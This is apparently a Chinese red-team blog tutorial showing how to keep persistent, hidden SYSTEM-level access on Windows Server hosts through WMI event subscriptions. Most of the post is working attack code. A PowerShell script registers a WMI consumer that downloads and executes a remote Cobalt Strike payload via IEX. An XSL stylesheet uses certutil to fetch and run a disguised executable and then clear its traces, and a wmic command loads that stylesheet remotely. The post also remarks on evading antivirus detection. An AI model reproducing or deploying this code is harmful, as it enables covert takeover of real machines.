聲明:原創文章,謝絕任何形式的轉載
0x01 模擬環境
IIS85-CN 192.168.3.5 windows 2012r2 64位 IIS10-CN 192.168.3.22 windows 2016 64位
0x02 Beacon 上線
關於wmi事件是個什么東西,此次不多做說明,還是暫時先側重在實際利用上,首先,准備好相應的 ps payload,特別注意,此處是直接用64位的ps payload,因為目標是64位系統,32位ps payload在win2012r2之后的系統上運行時可能會有問題
http://192.168.3.68:80/logo.gif
如下是 WMI-Persistence.ps1 腳本,代碼非常簡單,三個函數分別是 插入指定wmi事件,刪除指定wmi事件,然后查詢wmi事件,需要改的地方就一處,即加粗的遠程payload地址,當然,事件名也可以改成自己想要的,不過即使不改也沒啥太大關系,一眼看不太出來
<#
Credits to @mattifestion for his awesome work on WMI and Powershell Fileless Persistence. This script is an adaptation of his work.
#>
function Install-Persistence{
$Payload = "((new-object net.webclient).downloadstring('http://192.168.3.68:80/logo.gif'))"
$EventFilterName = 'Cleanup'
$EventConsumerName = 'DataCleanup'
$finalPayload = "powershell.exe -nop -c `"IEX $Payload`""
# Create event filter
$EventFilterArgs = @{
EventNamespace = 'root/cimv2'
Name = $EventFilterName
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
QueryLanguage = 'WQL'
}
$Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs
# Create CommandLineEventConsumer
$CommandLineConsumerArgs = @{
Name = $EventConsumerName
CommandLineTemplate = $finalPayload
}
$Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs
# Create FilterToConsumerBinding
$FilterToConsumerArgs = @{
Filter = $Filter
Consumer = $Consumer
}
$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs
#Confirm the Event Filter was created
$EventCheck = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'"
if ($EventCheck -ne $null) {
Write-Host "Event Filter $EventFilterName successfully written to host"
}
#Confirm the Event Consumer was created
$ConsumerCheck = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'"
if ($ConsumerCheck -ne $null) {
Write-Host "Event Consumer $EventConsumerName successfully written to host"
}
#Confirm the FiltertoConsumer was created
$BindingCheck = Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='$EventFilterName'"""
if ($BindingCheck -ne $null){
Write-Host "Filter To Consumer Binding successfully written to host"
}
}
function Remove-Persistence{
$EventFilterName = 'Cleanup'
$EventConsumerName = 'DataCleanup'
# Clean up Code - Comment this code out when you are installing persistence otherwise it will
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
}
function Check-WMI{
Write-Host "Showing All Root Event Filters"
Get-WmiObject -Namespace root/subscription -Class __EventFilter
Write-Host "Showing All CommandLine Event Consumers"
Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer
Write-Host "Showing All Filter to Consumer Bindings"
Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding
}
然后開始插入事件,一旦正常插入成功后,當目標再次重啟系統,管理員[administrator]正常登錄,稍等片刻[2016可能要稍微多等會兒]當系統在后台輪詢到我們的payload事件后,便會被觸發執行
# powershell -exec bypass PS > Import-Module .\WMI-Persistence.ps1 PS > Install-Persistence PS > Check-WMI
隨之,system權限的beacon被正常彈回
0x03 自定義上線
上面只是大致說明了下,如何利用wmi事件實現beacon的簡單上線,接着,我們再來看下如何實現自定義上線,此處,圖方便,我們直接用wmic來遠程加載執行即可
http://192.168.3.68:80/load.jpg 把馬重新命個后綴
wmi.xsl 實現的功能很明了,即 certutil下載者
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c certutil -urlcache -split -f http://*/load.jpg %temp%/load.exe & %temp%/load.exe & certutil.exe -urlcache -split -f http://*/load.jpg delete",0);
]]> </ms:script>
</stylesheet>
修改WMI-Persistence.ps1 腳本,只需把payload部分換下就行,別的不需要動
# wmic os get /FORMAT:"http://192.168.3.68:80/wmi.xsl"
之后繼續像上面一樣,正常插入wmi事件,等待目標重啟系統,administrator正常登錄,稍等片刻,便會看到我們system權限的馬如期上線,如下
powershell -exec bypass PS > Import-Module .\WMI-Persistence.ps1 PS > Install-Persistence PS > Check-WMI PS > Remove-Persistence 用完以后務必要記得隨手刪掉
小結:
可以看到,默認情況下回來的shell直接就是system權限,如果沒記錯的話,大致原理就是系統會在后台一直不停的輪詢wmi事件,當輪到我們的payload事件時就會觸發執行上線,因為payload是藏到wmi事件里的,一眼很難看到,隱蔽性相對高了不少[ 不過值得注意的是,事件本身雖然隱蔽,但觸發payload執行的方式就不一定了 ],只要payload事件沒被發現,檢測到或者殺掉,通常情況下shell也不會輕易掉,至於wmi事件是個什么東西,篇幅限制,此處就不多說了,大家如果有興趣的話,可自行谷歌了解,另外,文中執行payload的方式對某些殺軟來講是沒有任何意義的,比如,360 因為它肯定會依次攔截像certutil.exe ,powershell.exe, wmic.exe 這種可以用來遠程執行的進程,這些全部都是會直接觸發報警的點,不過,這也僅僅是國內的某些殺軟會這么干,並不代表所有殺軟都肯定會攔,關於如何突破這些點,待進一步學習后,再做補充說明,此處僅作入門科普,祝好運 😊
更多內容請直接關注個人公眾號或知識星球 "紅隊攻防揭秘"
-- by klion